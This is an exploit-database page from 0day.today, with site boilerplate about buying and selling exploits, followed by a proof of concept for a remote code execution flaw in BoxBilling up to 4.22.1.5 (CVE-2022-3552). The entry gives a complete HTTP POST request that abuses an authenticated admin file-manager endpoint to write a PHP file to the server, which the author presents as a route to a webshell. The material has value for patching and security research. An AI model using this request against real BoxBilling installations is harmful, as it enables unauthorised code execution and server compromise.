0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BoxBilling <= 4.22.1.5 - Remote Code Execution Vulnerability
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) # Exploit Author: zetc0de # Vendor Homepage: https://www.boxbilling.org/ # Software Link: https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip # Version: <=4.22.1.5 (Latest) # Tested on: Windows 10 # CVE : CVE-2022-3552 # BoxBilling was vulnerable to Unrestricted File Upload. # In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS. # With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE ################################################################################### ## POC POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1 Host: local.com:8089 Content-Length: 52 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d Connection: close order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> POC Video : https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing # 0day.today [2024-11-15] #